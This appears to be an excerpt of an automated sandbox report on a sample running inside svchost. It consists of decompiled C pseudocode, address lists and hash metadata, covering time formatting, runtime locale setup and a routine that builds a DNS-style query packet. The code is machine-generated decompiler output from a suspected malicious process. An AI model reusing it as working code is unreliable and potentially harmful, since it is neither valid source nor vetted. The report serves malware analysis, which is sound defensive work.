                                                                                                                                                                                                                                                    0x04013465
                                                                                                                                                                                                                                                    0x0401346a
                                                                                                                                                                                                                                                    0x0401346d
                                                                                                                                                                                                                                                    0x04013474
                                                                                                                                                                                                                                                    0x04013483
                                                                                                                                                                                                                                                    0x04013476
                                                                                                                                                                                                                                                    0x0401347e
                                                                                                                                                                                                                                                    0x0401347e
                                                                                                                                                                                                                                                    0x0401348d
                                                                                                                                                                                                                                                    0x04013492
                                                                                                                                                                                                                                                    0x04013499
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x04013499
                                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 04013479
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.862471983.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.862471983.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Iterator_baseIterator_base::_std::_
                                                                                                                                                                                                                                                    • String ID: $oB
                                                                                                                                                                                                                                                    • API String ID: 370429920-3132252410
                                                                                                                                                                                                                                                    • Opcode ID: 3f042deba27dbb9a6c53589dfe86891ceed2fc21ea38daa22f1df265e620214e
                                                                                                                                                                                                                                                    • Instruction ID: ff111addb76ca9d35d31a8907435c4d95596588a54556616c049ff3552255213
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3f042deba27dbb9a6c53589dfe86891ceed2fc21ea38daa22f1df265e620214e
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5651FDB5E00218DFEB14DF98D984A9DB7B5FF48308F508169D9096B351D771B944CF81
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    C-Code - Quality: 50%
                                                                                                                                                                                                                                                    			E04011E70(void* __ebx, intOrPtr __ecx, void* __eflags) {
                                                                                                                                                                                                                                                    				signed short _v8;
                                                                                                                                                                                                                                                    				signed short _v10;
                                                                                                                                                                                                                                                    				signed short _v12;
                                                                                                                                                                                                                                                    				signed short _v14;
                                                                                                                                                                                                                                                    				signed short _v16;
                                                                                                                                                                                                                                                    				signed short _v18;
                                                                                                                                                                                                                                                    				signed short _v20;
                                                                                                                                                                                                                                                    				signed int _v24;
                                                                                                                                                                                                                                                    				void _v60;
                                                                                                                                                                                                                                                    				intOrPtr _v64;
                                                                                                                                                                                                                                                    				signed int _v68;
                                                                                                                                                                                                                                                    				void _v120;
                                                                                                                                                                                                                                                    				intOrPtr _v124;
                                                                                                                                                                                                                                                    				void _v156;
                                                                                                                                                                                                                                                    				signed int _v332;
                                                                                                                                                                                                                                                    				intOrPtr _v336;
                                                                                                                                                                                                                                                    				intOrPtr _v340;
                                                                                                                                                                                                                                                    				intOrPtr _v344;
                                                                                                                                                                                                                                                    				intOrPtr _v348;
                                                                                                                                                                                                                                                    				char _v352;
                                                                                                                                                                                                                                                    				intOrPtr _v356;
                                                                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                                                                    				void* _t95;
                                                                                                                                                                                                                                                    				signed int _t107;
                                                                                                                                                                                                                                                    				signed int _t141;
                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                    				_t95 = __ebx;
                                                                                                                                                                                                                                                    				_v24 =  *0x429024 ^ _t141;
                                                                                                                                                                                                                                                    				_v348 = __ecx;
                                                                                                                                                                                                                                                    				_v64 = 0;
                                                                                                                                                                                                                                                    				memcpy( &_v60, 0x426fdc, 8 << 2);
                                                                                                                                                                                                                                                    				asm("movsw");
                                                                                                                                                                                                                                                    				asm("movsb");
                                                                                                                                                                                                                                                    				memcpy( &_v156, 0x427000, 7 << 2);
                                                                                                                                                                                                                                                    				asm("movsb");
                                                                                                                                                                                                                                                    				memcpy( &_v120, 0x427020, 0xc << 2);
                                                                                                                                                                                                                                                    				asm("movsb");
                                                                                                                                                                                                                                                    				_v336 = E04020CE0(0x3d);
                                                                                                                                                                                                                                                    				_v124 = _v336;
                                                                                                                                                                                                                                                    				E04007010(0x427038, _v124, 0, 0x3d);
                                                                                                                                                                                                                                                    				 *0x425108( &_v332);
                                                                                                                                                                                                                                                    				 *0x425180( &_v20);
                                                                                                                                                                                                                                                    				asm("cdq");
                                                                                                                                                                                                                                                    				asm("cdq");
                                                                                                                                                                                                                                                    				_t107 = _v332 / 0x3c * 0x64 + _v332 % 0x3c;
                                                                                                                                                                                                                                                    				_v68 = _t107;
                                                                                                                                                                                                                                                    				if(_t107 < 0) {
                                                                                                                                                                                                                                                    					_v68 =  ~_v68;
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				if(_v332 > 0) {
                                                                                                                                                                                                                                                    					_v352 = 0x427058;
                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                    					_v352 = 0x427054;
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				_t33 =  &_v352; // 0x427058
                                                                                                                                                                                                                                                    				 *0x4251f8(_v124, 0x3c,  &_v60, _t141 + (_v16 & 0x0000ffff) * 4 - 0x98, _v14 & 0x0000ffff, _t141 + (_v18 & 0x0000ffff) * 4 - 0x78, _v20 & 0x0000ffff, _v12 & 0x0000ffff, _v10 & 0x0000ffff, _v8 & 0x0000ffff,  *_t33, _v68);
                                                                                                                                                                                                                                                    				_v340 = E04020CE0(8);
                                                                                                                                                                                                                                                    				if(_v340 == 0) {
                                                                                                                                                                                                                                                    					_v356 = 0;
                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                    					_v356 = E0401F4E0(_v340);
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				_v64 = _v356;
                                                                                                                                                                                                                                                    				_t125 = _v124;
                                                                                                                                                                                                                                                    				E0401FC90(_t95, _v64, 0x427038, 0x3c, _v124, E040070A0(_v124));
                                                                                                                                                                                                                                                    				if(_v124 != 0) {
                                                                                                                                                                                                                                                    					_v344 = _v124;
                                                                                                                                                                                                                                                    					_t125 = _v344;
                                                                                                                                                                                                                                                    					E04020CC0(_v344);
                                                                                                                                                                                                                                                    					_v124 = 0x666;
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				return E04006C8C(_v64, _t95, _v24 ^ _t141, _t125, 0x427038, 0x3c);
                                                                                                                                                                                                                                                    			}





























                                                                                                                                                                                                                                                    0x04011e70
                                                                                                                                                                                                                                                    0x04011e80
                                                                                                                                                                                                                                                    0x04011e85
                                                                                                                                                                                                                                                    0x04011e8b
                                                                                                                                                                                                                                                    0x04011e9f
                                                                                                                                                                                                                                                    0x04011ea1
                                                                                                                                                                                                                                                    0x04011ea3
                                                                                                                                                                                                                                                    0x04011eb4
                                                                                                                                                                                                                                                    0x04011eb6
                                                                                                                                                                                                                                                    0x04011ec4
                                                                                                                                                                                                                                                    0x04011ec6
                                                                                                                                                                                                                                                    0x04011ed1
                                                                                                                                                                                                                                                    0x04011edd
                                                                                                                                                                                                                                                    0x04011ee8
                                                                                                                                                                                                                                                    0x04011ef7
                                                                                                                                                                                                                                                    0x04011f01
                                                                                                                                                                                                                                                    0x04011f0d
                                                                                                                                                                                                                                                    0x04011f20
                                                                                                                                                                                                                                                    0x04011f28
                                                                                                                                                                                                                                                    0x04011f2a
                                                                                                                                                                                                                                                    0x04011f2d
                                                                                                                                                                                                                                                    0x04011f34
                                                                                                                                                                                                                                                    0x04011f34
                                                                                                                                                                                                                                                    0x04011f3e
                                                                                                                                                                                                                                                    0x04011f4c
                                                                                                                                                                                                                                                    0x04011f40
                                                                                                                                                                                                                                                    0x04011f40
                                                                                                                                                                                                                                                    0x04011f40
                                                                                                                                                                                                                                                    0x04011f5a
                                                                                                                                                                                                                                                    0x04011f99
                                                                                                                                                                                                                                                    0x04011fac
                                                                                                                                                                                                                                                    0x04011fb9
                                                                                                                                                                                                                                                    0x04011fce
                                                                                                                                                                                                                                                    0x04011fbb
                                                                                                                                                                                                                                                    0x04011fc6
                                                                                                                                                                                                                                                    0x04011fc6
                                                                                                                                                                                                                                                    0x04011fde
                                                                                                                                                                                                                                                    0x04011fe1
                                                                                                                                                                                                                                                    0x04011ff5
                                                                                                                                                                                                                                                    0x04011ffe
                                                                                                                                                                                                                                                    0x04012003
                                                                                                                                                                                                                                                    0x04012009
                                                                                                                                                                                                                                                    0x04012010
                                                                                                                                                                                                                                                    0x04012018
                                                                                                                                                                                                                                                    0x04012018
                                                                                                                                                                                                                                                    0x04012031

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.862471983.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.862471983.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Iterator_baseIterator_base::__memset_strlenstd::_
                                                                                                                                                                                                                                                    • String ID: pB$XpB
                                                                                                                                                                                                                                                    • API String ID: 3713721629-2178088481
                                                                                                                                                                                                                                                    • Opcode ID: b650810ef28b1162b20fb2bb24cf354fa744417f5b86810a3d7f07fcca2c8c7f
                                                                                                                                                                                                                                                    • Instruction ID: caac39b4c571324483d0a18a7aa4e44b6fb00a313373015349f42bda7133a820
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b650810ef28b1162b20fb2bb24cf354fa744417f5b86810a3d7f07fcca2c8c7f
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1A513EB1E04228DBEB24DF95DC44BEEB7B5BB88308F1041A9E509BB290D7756A84CF51
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.862471983.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.862471983.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _memset
                                                                                                                                                                                                                                                    • String ID: '$'
                                                                                                                                                                                                                                                    • API String ID: 2102423945-2527190458
                                                                                                                                                                                                                                                    • Opcode ID: a325690150a5eb3ed6ffc346bd302d07b89a03f3d19550fdf211c07dc6659787
                                                                                                                                                                                                                                                    • Instruction ID: 53bb57586c5e39befda5455b8bbd06f4bf2bc56d3601b69197fc609fafef56d8
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a325690150a5eb3ed6ffc346bd302d07b89a03f3d19550fdf211c07dc6659787
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1C418171B04329EBEB20DFA0CC45FED77B4AB44704F804599B609BA1C0D7B5A644CF96
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    C-Code - Quality: 58%
                                                                                                                                                                                                                                                    			E040093F6(intOrPtr* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                                                                                                    				intOrPtr _t23;
                                                                                                                                                                                                                                                    				intOrPtr _t28;
                                                                                                                                                                                                                                                    				intOrPtr _t45;
                                                                                                                                                                                                                                                    				void* _t46;
                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                    				_t35 = __ebx;
                                                                                                                                                                                                                                                    				E04009CE8(__ebx, __edi, __esi);
                                                                                                                                                                                                                                                    				_t23 =  *0x425190(0x425310, 0x427a18, 0xc);
                                                                                                                                                                                                                                                    				if(_t23 == 0) {
                                                                                                                                                                                                                                                    					_t23 = E040099AE(0x425310);
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				 *((intOrPtr*)(_t46 - 0x1c)) = _t23;
                                                                                                                                                                                                                                                    				_t45 =  *((intOrPtr*)(_t46 + 8));
                                                                                                                                                                                                                                                    				 *((intOrPtr*)(_t45 + 0x5c)) = 0x4259d0;
                                                                                                                                                                                                                                                    				 *((intOrPtr*)(_t45 + 0x14)) = 1;
                                                                                                                                                                                                                                                    				if(_t23 != 0) {
                                                                                                                                                                                                                                                    					_t35 =  *0x425114;
                                                                                                                                                                                                                                                    					 *((intOrPtr*)(_t45 + 0x1f8)) =  *_t35(_t23, 0x425300);
                                                                                                                                                                                                                                                    					_t6 = _t46 - 0x1c; // 0x42532c
                                                                                                                                                                                                                                                    					 *((intOrPtr*)(_t45 + 0x1fc)) =  *_t35( *_t6, 0x42532c);
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				 *((intOrPtr*)(_t45 + 0x70)) = 1;
                                                                                                                                                                                                                                                    				 *((char*)(_t45 + 0xc8)) = 0x43;
                                                                                                                                                                                                                                                    				 *((char*)(_t45 + 0x14b)) = 0x43;
                                                                                                                                                                                                                                                    				 *((intOrPtr*)(_t45 + 0x68)) = 0x4294e8;
                                                                                                                                                                                                                                                    				E0400B404(_t35, 0xd);
                                                                                                                                                                                                                                                    				 *(_t46 - 4) =  *(_t46 - 4) & 0x00000000;
                                                                                                                                                                                                                                                    				 *0x4250a4( *((intOrPtr*)(_t45 + 0x68)));
                                                                                                                                                                                                                                                    				 *(_t46 - 4) = 0xfffffffe;
                                                                                                                                                                                                                                                    				E040094CB();
                                                                                                                                                                                                                                                    				E0400B404(_t35, 0xc);
                                                                                                                                                                                                                                                    				 *(_t46 - 4) = 1;
                                                                                                                                                                                                                                                    				_t28 =  *((intOrPtr*)(_t46 + 0xc));
                                                                                                                                                                                                                                                    				 *((intOrPtr*)(_t45 + 0x6c)) = _t28;
                                                                                                                                                                                                                                                    				if(_t28 == 0) {
                                                                                                                                                                                                                                                    					 *((intOrPtr*)(_t45 + 0x6c)) =  *0x4294d8;
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				E0400CA63( *((intOrPtr*)(_t45 + 0x6c)));
                                                                                                                                                                                                                                                    				 *(_t46 - 4) = 0xfffffffe;
                                                                                                                                                                                                                                                    				return E04009D2D(E040094D4());
                                                                                                                                                                                                                                                    			}







                                                                                                                                                                                                                                                    0x040093f6
                                                                                                                                                                                                                                                    0x040093fd
                                                                                                                                                                                                                                                    0x04009408
                                                                                                                                                                                                                                                    0x04009410
                                                                                                                                                                                                                                                    0x04009413
                                                                                                                                                                                                                                                    0x04009418
                                                                                                                                                                                                                                                    0x04009419
                                                                                                                                                                                                                                                    0x0400941c
                                                                                                                                                                                                                                                    0x0400941f
                                                                                                                                                                                                                                                    0x04009429
                                                                                                                                                                                                                                                    0x0400942e
                                                                                                                                                                                                                                                    0x04009436
                                                                                                                                                                                                                                                    0x0400943e
                                                                                                                                                                                                                                                    0x04009449
                                                                                                                                                                                                                                                    0x0400944e
                                                                                                                                                                                                                                                    0x0400944e
                                                                                                                                                                                                                                                    0x04009454
                                                                                                                                                                                                                                                    0x04009457
                                                                                                                                                                                                                                                    0x0400945e
                                                                                                                                                                                                                                                    0x04009465
                                                                                                                                                                                                                                                    0x0400946e
                                                                                                                                                                                                                                                    0x04009474
                                                                                                                                                                                                                                                    0x0400947b
                                                                                                                                                                                                                                                    0x04009481
                                                                                                                                                                                                                                                    0x04009488
                                                                                                                                                                                                                                                    0x0400948f
                                                                                                                                                                                                                                                    0x04009495
                                                                                                                                                                                                                                                    0x04009498
                                                                                                                                                                                                                                                    0x0400949b
                                                                                                                                                                                                                                                    0x040094a0
                                                                                                                                                                                                                                                    0x040094a7
                                                                                                                                                                                                                                                    0x040094a7
                                                                                                                                                                                                                                                    0x040094ad
                                                                                                                                                                                                                                                    0x040094b3
                                                                                                                                                                                                                                                    0x040094c4

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.862471983.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.862471983.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: __lock$___addlocaleref__crt_waiting_on_module_handle
                                                                                                                                                                                                                                                    • String ID: ,SB
                                                                                                                                                                                                                                                    • API String ID: 1628550938-3344058557
                                                                                                                                                                                                                                                    • Opcode ID: 3d3124fdb95e4bcea8cf975f9c6f5d5c3062870727a51910439b4630ff52904f
                                                                                                                                                                                                                                                    • Instruction ID: 993150cf3f8eb55d910a7a38cf2a2ebf2ab550eb7e4aba8557308306761a1f3f
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3d3124fdb95e4bcea8cf975f9c6f5d5c3062870727a51910439b4630ff52904f
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6F1193B1904B019EF720EF759801B99BBE0AF00318F50C51AD599A72D1C774A641CB59
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    C-Code - Quality: 51%
                                                                                                                                                                                                                                                    			E0401A890(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, intOrPtr _a4, signed short _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                                                                                                                                                    				short* _v8;
                                                                                                                                                                                                                                                    				intOrPtr _v12;
                                                                                                                                                                                                                                                    				short* _v16;
                                                                                                                                                                                                                                                    				intOrPtr _v20;
                                                                                                                                                                                                                                                    				intOrPtr _v24;
                                                                                                                                                                                                                                                    				short* _v28;
                                                                                                                                                                                                                                                    				intOrPtr _v32;
                                                                                                                                                                                                                                                    				signed int _v36;
                                                                                                                                                                                                                                                    				char _v292;
                                                                                                                                                                                                                                                    				intOrPtr _v296;
                                                                                                                                                                                                                                                    				char _v300;
                                                                                                                                                                                                                                                    				intOrPtr _v304;
                                                                                                                                                                                                                                                    				intOrPtr _v308;
                                                                                                                                                                                                                                                    				intOrPtr _v312;
                                                                                                                                                                                                                                                    				intOrPtr _v316;
                                                                                                                                                                                                                                                    				intOrPtr _v320;
                                                                                                                                                                                                                                                    				intOrPtr _t138;
                                                                                                                                                                                                                                                    				void* _t177;
                                                                                                                                                                                                                                                    				signed char _t187;
                                                                                                                                                                                                                                                    				signed char _t192;
                                                                                                                                                                                                                                                    				void* _t195;
                                                                                                                                                                                                                                                    				void* _t253;
                                                                                                                                                                                                                                                    				void* _t254;
                                                                                                                                                                                                                                                    				signed int _t255;
                                                                                                                                                                                                                                                    				void* _t256;
                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                    				_t254 = __esi;
                                                                                                                                                                                                                                                    				_t253 = __edi;
                                                                                                                                                                                                                                                    				_t195 = __ebx;
                                                                                                                                                                                                                                                    				_v36 =  *0x429024 ^ _t255;
                                                                                                                                                                                                                                                    				_v320 = __ecx;
                                                                                                                                                                                                                                                    				_v8 = 0;
                                                                                                                                                                                                                                                    				_v12 = 0;
                                                                                                                                                                                                                                                    				while(_a4 != 0 && _a12 != 0 && _a16 >= 1 && _a16 <= 3) {
                                                                                                                                                                                                                                                    					_t138 = E040070A0(_a4);
                                                                                                                                                                                                                                                    					_t256 = _t256 + 4;
                                                                                                                                                                                                                                                    					_v296 = _t138;
                                                                                                                                                                                                                                                    					if(_v296 >= 1) {
                                                                                                                                                                                                                                                    						E04007010(_t253,  &_v292, 0, 0xff);
                                                                                                                                                                                                                                                    						_t256 = _t256 + 0xc;
                                                                                                                                                                                                                                                    						_t228 =  &_v292;
                                                                                                                                                                                                                                                    						_v20 = E04019850(_v320, _a4, _v296,  &_v292, 0xff);
                                                                                                                                                                                                                                                    						if(_v20 >= 1) {
                                                                                                                                                                                                                                                    							_v300 = 0;
                                                                                                                                                                                                                                                    							if(_a16 != 1) {
                                                                                                                                                                                                                                                    								if(_a16 != 2) {
                                                                                                                                                                                                                                                    									if(_a16 != 3) {
                                                                                                                                                                                                                                                    										goto L22;
                                                                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                                                                    										_v304 =  *0x425260(_a12);
                                                                                                                                                                                                                                                    										if(_v304 != 0) {
                                                                                                                                                                                                                                                    											_v300 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v304 + 0xc))))));
                                                                                                                                                                                                                                                    											_t187 = E0401BA40(4, _a12,  &_v300);
                                                                                                                                                                                                                                                    											_t256 = _t256 + 0xc;
                                                                                                                                                                                                                                                    											if((_t187 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                    												E0401C2A0(_t253, 4, _a12,  &_v300);
                                                                                                                                                                                                                                                    												_t256 = _t256 + 0xc;
                                                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                                                    											goto L22;
                                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                                                    									_v300 =  *0x425258(_a12);
                                                                                                                                                                                                                                                    									_t192 = E0401BA40(4, _a12,  &_v300);
                                                                                                                                                                                                                                                    									_t256 = _t256 + 0xc;
                                                                                                                                                                                                                                                    									if((_t192 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                    										E0401C2A0(_t253, 4, _a12,  &_v300);
                                                                                                                                                                                                                                                    										_t256 = _t256 + 0xc;
                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                    									goto L22;
                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                                    								_v300 = _a12;
                                                                                                                                                                                                                                                    								L22:
                                                                                                                                                                                                                                                    								_v308 = E04020CE0(0x1000);
                                                                                                                                                                                                                                                    								_v32 = _v308;
                                                                                                                                                                                                                                                    								E04007010(_t253, _v32, 0, 0x1000);
                                                                                                                                                                                                                                                    								_v16 = 0;
                                                                                                                                                                                                                                                    								_v28 = 0;
                                                                                                                                                                                                                                                    								_v16 = _v32;
                                                                                                                                                                                                                                                    								 *_v16 =  *0x4250b4();
                                                                                                                                                                                                                                                    								 *(_v16 + 2) =  *(_v16 + 2) & 0x0000007f;
                                                                                                                                                                                                                                                    								 *(_v16 + 2) =  *(_v16 + 2) & 0x00000087;
                                                                                                                                                                                                                                                    								 *(_v16 + 2) =  *(_v16 + 2) & 0x000000fb;
                                                                                                                                                                                                                                                    								 *(_v16 + 2) =  *(_v16 + 2) & 0x000000fd;
                                                                                                                                                                                                                                                    								 *(_v16 + 2) =  *(_v16 + 2) | 0x00000001;
                                                                                                                                                                                                                                                    								 *(_v16 + 3) =  *(_v16 + 3) & 0x0000007f;
                                                                                                                                                                                                                                                    								 *(_v16 + 3) =  *(_v16 + 3) & 0x000000bf;
                                                                                                                                                                                                                                                    								 *(_v16 + 3) =  *(_v16 + 3) & 0x000000df;
                                                                                                                                                                                                                                                    								 *(_v16 + 3) =  *(_v16 + 3) & 0x000000ef;
                                                                                                                                                                                                                                                    								 *(_v16 + 3) =  *(_v16 + 3) & 0x000000f0;
                                                                                                                                                                                                                                                    								 *((short*)(_v16 + 4)) =  *0x425278(1);
                                                                                                                                                                                                                                                    								 *((short*)(_v16 + 6)) = 0;
                                                                                                                                                                                                                                                    								 *((short*)(_v16 + 8)) = 0;
                                                                                                                                                                                                                                                    								 *((short*)(_v16 + 0xa)) = 0;
                                                                                                                                                                                                                                                    								E04006CA0(_t195, _t253, _t254, _v32 + 0xc,  &_v292);
                                                                                                                                                                                                                                                    								_v28 = _v32 + E04008A9C( &_v292, 0xfe) + 0xd;
                                                                                                                                                                                                                                                    								 *_v28 =  *0x425278(_a8 & 0x0000ffff, _v20);
                                                                                                                                                                                                                                                    								 *((short*)(_v28 + 2)) =  *0x425278(1);
                                                                                                                                                                                                                                                    								_t177 = E04008A9C( &_v292, 0xfe);
                                                                                                                                                                                                                                                    								_t256 = _t256 + 0x2c;
                                                                                                                                                                                                                                                    								_v24 = _t177 + 0x11;
                                                                                                                                                                                                                                                    								_t228 = _v32;
                                                                                                                                                                                                                                                    								_v8 = E0401D100(_t195,  *((intOrPtr*)(_v320 + 0x10)), _t253, _t254, _v300, 0x35, _v32, _v24);
                                                                                                                                                                                                                                                    								if(_v32 != 0) {
                                                                                                                                                                                                                                                    									_t228 = _v32;
                                                                                                                                                                                                                                                    									_v312 = _v32;
                                                                                                                                                                                                                                                    									E04020CC0(_v312);
                                                                                                                                                                                                                                                    									_t256 = _t256 + 4;
                                                                                                                                                                                                                                                    									_v32 = 0;
                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                    								if(0 != 0) {
                                                                                                                                                                                                                                                    									continue;
                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					L25:
                                                                                                                                                                                                                                                    					if(_v8 == 0 && _v12 != 0) {
                                                                                                                                                                                                                                                    						_t228 = _v12;
                                                                                                                                                                                                                                                    						_v316 = _v12;
                                                                                                                                                                                                                                                    						E04020CC0(_v316);
                                                                                                                                                                                                                                                    						_v12 = 0;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					return E04006C8C(_v8, _t195, _v36 ^ _t255, _t228, _t253, _t254);
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				goto L25;
                                                                                                                                                                                                                                                    			}




























                                                                                                                                                                                                                                                    0x0401a890
                                                                                                                                                                                                                                                    0x0401a890
                                                                                                                                                                                                                                                    0x0401a890
                                                                                                                                                                                                                                                    0x0401a8a0
                                                                                                                                                                                                                                                    0x0401a8a3
                                                                                                                                                                                                                                                    0x0401a8a9
                                                                                                                                                                                                                                                    0x0401a8b0
                                                                                                                                                                                                                                                    0x0401a8b7
                                                                                                                                                                                                                                                    0x0401a8d8
                                                                                                                                                                                                                                                    0x0401a8dd
                                                                                                                                                                                                                                                    0x0401a8e0
                                                                                                                                                                                                                                                    0x0401a8ed
                                                                                                                                                                                                                                                    0x0401a902
                                                                                                                                                                                                                                                    0x0401a907
                                                                                                                                                                                                                                                    0x0401a90f
                                                                                                                                                                                                                                                    0x0401a92c
                                                                                                                                                                                                                                                    0x0401a933
                                                                                                                                                                                                                                                    0x0401a93a
                                                                                                                                                                                                                                                    0x0401a948
                                                                                                                                                                                                                                                    0x0401a95c
                                                                                                                                                                                                                                                    0x0401a9a5
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x0401a9a7
                                                                                                                                                                                                                                                    0x0401a9b1
                                                                                                                                                                                                                                                    0x0401a9be
                                                                                                                                                                                                                                                    0x0401a9cd
                                                                                                                                                                                                                                                    0x0401a9e0
                                                                                                                                                                                                                                                    0x0401a9e5
                                                                                                                                                                                                                                                    0x0401a9ed
                                                                                                                                                                                                                                                    0x0401a9fc
                                                                                                                                                                                                                                                    0x0401aa01
                                                                                                                                                                                                                                                    0x0401aa01
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x0401aa04
                                                                                                                                                                                                                                                    0x0401a9be
                                                                                                                                                                                                                                                    0x0401a95e
                                                                                                                                                                                                                                                    0x0401a968
                                                                                                                                                                                                                                                    0x0401a97b
                                                                                                                                                                                                                                                    0x0401a980
                                                                                                                                                                                                                                                    0x0401a988
                                                                                                                                                                                                                                                    0x0401a997
                                                                                                                                                                                                                                                    0x0401a99c
                                                                                                                                                                                                                                                    0x0401a99c
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x0401a99f
                                                                                                                                                                                                                                                    0x0401a94a
                                                                                                                                                                                                                                                    0x0401a94d
                                                                                                                                                                                                                                                    0x0401aa0b
                                                                                                                                                                                                                                                    0x0401aa18
                                                                                                                                                                                                                                                    0x0401aa24
                                                                                                                                                                                                                                                    0x0401aa32
                                                                                                                                                                                                                                                    0x0401aa3a
                                                                                                                                                                                                                                                    0x0401aa41
                                                                                                                                                                                                                                                    0x0401aa4b
                                                                                                                                                                                                                                                    0x0401aa57
                                                                                                                                                                                                                                                    0x0401aa65
                                                                                                                                                                                                                                                    0x0401aa73
                                                                                                                                                                                                                                                    0x0401aa81
                                                                                                                                                                                                                                                    0x0401aa8f
                                                                                                                                                                                                                                                    0x0401aa9d
                                                                                                                                                                                                                                                    0x0401aaab
                                                                                                                                                                                                                                                    0x0401aab9
                                                                                                                                                                                                                                                    0x0401aac7
                                                                                                                                                                                                                                                    0x0401aad5
                                                                                                                                                                                                                                                    0x0401aae3
                                                                                                                                                                                                                                                    0x0401aaf1
                                                                                                                                                                                                                                                    0x0401aafa
